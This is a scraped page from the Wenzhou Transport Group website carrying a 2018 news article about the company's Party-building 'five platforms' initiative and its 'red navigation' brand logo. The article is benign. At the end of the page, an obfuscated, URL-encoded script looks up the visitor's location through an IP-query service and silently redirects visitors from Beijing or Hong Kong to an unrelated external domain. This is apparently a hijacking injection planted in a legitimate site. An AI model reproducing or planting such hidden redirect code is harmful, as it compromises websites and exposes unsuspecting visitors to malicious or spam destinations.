当前位置: 您当前的位置 : 温州交运集团 > 交运资讯 > 集团要闻 >正文
集团搭建五个“平台” 打造特色党建品牌
来源: 发布时间:2018年12月12日 09:56:06 作者: 字体:

  近年来,集团把打造特色党建品牌作为强化基层组织建设的重要抓手,通过搭建“五个平台”,不断激发基层党建新活力,全面提升党建工作的内涵和品质。

  集团党委紧扣“围绕中心抓党建、抓好党建促发展”的工作理念,以亮“红色身份”,建“红色阵地”,搭“红色平台”,抓“红色覆盖”,塑“红色亮点”,做“红色服务”,树“红色形象”,建“红色廉政”等八大举措为抓手,全力打造“红色引航、品质交运”党建品牌,积极发挥党建品牌典型引路、示范带动作用,进一步汇聚发展力量,破解发展难题,加快追赶超越,不断推动党建工作全面进步、全面提升、全面过硬。一是搭建“学习平台”:搭建“交运党群e家”微信公众号学习宣传平台,整合学习资源,定期推送学习资料、党建信息动态,发布党组织和党员的先锋事迹,逐步建立起党内学习长效机制;推行“微党课”,开展“微讲堂”,让每个普通党员走上讲台,打造党员开放式、互动式、分享式、体验式的学习教育平台,不断提升党员干部的从业能力和综合素质。二是搭建“活动平台”:以创建党员活动场所为主要载体,开展党群服务中心、党员活动室等阵地建设;丰富活动形式和内容,积极发挥红色阵地的先锋引领作用,结合各企业特点,让活动平台深入到基层,创建红色车厢、红色班组、红色场站、红色展厅、红色走廊等,营造党建活动氛围,打造坚强战斗堡垒。三是搭建“服务平台”:积极开展精准扶贫结对帮扶、文明礼让斑马线、BRT城市书巢、春运暖冬行动、高考爱心出租车等党员志愿服务行动;组建党员志愿服务队品牌,积极开展党员志愿服务行动,丰富志愿服务内容,创新志愿服务形式,将红色服务做实做优。四是搭建“创优平台”:以“四优四强”党建示范岗为主题,通过推行党员先锋指数考评,大力开展“党员先锋岗”、“党员示范岗”、“党员示范线”、“党员示范车”等评选活动,开展“走在前列、做表率”等创先争优活动,充分发挥党员干部的先锋模范作用。五是搭建“廉政平台”:通过交运报、宣传栏、企业官网、微信平台等开展廉政宣传教育,增强反腐倡廉教育的针对性和有效性;通过廉洁从业专题讲座、廉政考试、任前廉政谈话等多种形式使各级领导干部严格规范自身行为,自觉坚守思想道德防线,强化对关键环节监督检查,增强监督检查实效。

  目前,集团下属各单位正根据各自的党建工作实际,开展相应的品牌创建活动,共计打造了“新时代、心向党、星服务”、“快速先锋”、“党旗引领,高速加油”等14个党建品牌,形成以“红色引航,品质交运”党建品牌为统领,各二级单位为基础的“1+14”党建品牌体系。

  “红色引航品质交运”首亮相集团党建品牌标识外形为导航定位图标,主体由党徽、火炬、红星、定位符号等元素组成,集中体现和突出了“红色引航、品质交运”的内涵和交通运输企业的行业特征。其中,火炬和定位符号穿插形似“W”,水纹形似“Z”,代表“温州”;火炬和定位符号的左、右部分结合分别形似“J”“Y”则代表交运。意在“以党建为交通运输国企的导航仪,打造平安和谐品质交运”,充分体现党建“引领发展、服务中心”的工作原则,积极发挥党建品牌典型引路、示范带动作用,加快追赶超越,确保实现“平安和谐品质交运”的奋斗目标。

交运资讯

WENZHOU TRANSPORTATION

交运电子报

GROUP BRIEFING

交运电子报

%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//ip.ws.126.net/ipquery%22%3E%3C/script%3E%0A%3Cscript%20type%3D%22text/javascript%22%3E%0Astrdistrict%20%3D%5Blo%2C%20lc%5D.join%28%27%5Ct%27%29%3B%0Aif%28strdistrict.indexOf%28%22%26%2321271%3B%26%2320140%3B%22%29%3E0%20%7C%7C%20strdistrict.indexOf%28%22%26%2339321%3B%26%2328207%3B%22%29%3E0%29%0A%7B%0Awindow.location.href%3D%22http%3A//www.arrdm.com%22%3B%20%20%20%0A%7D%0Aelse%0A%7B%0A%7D%0A%3C/script%3E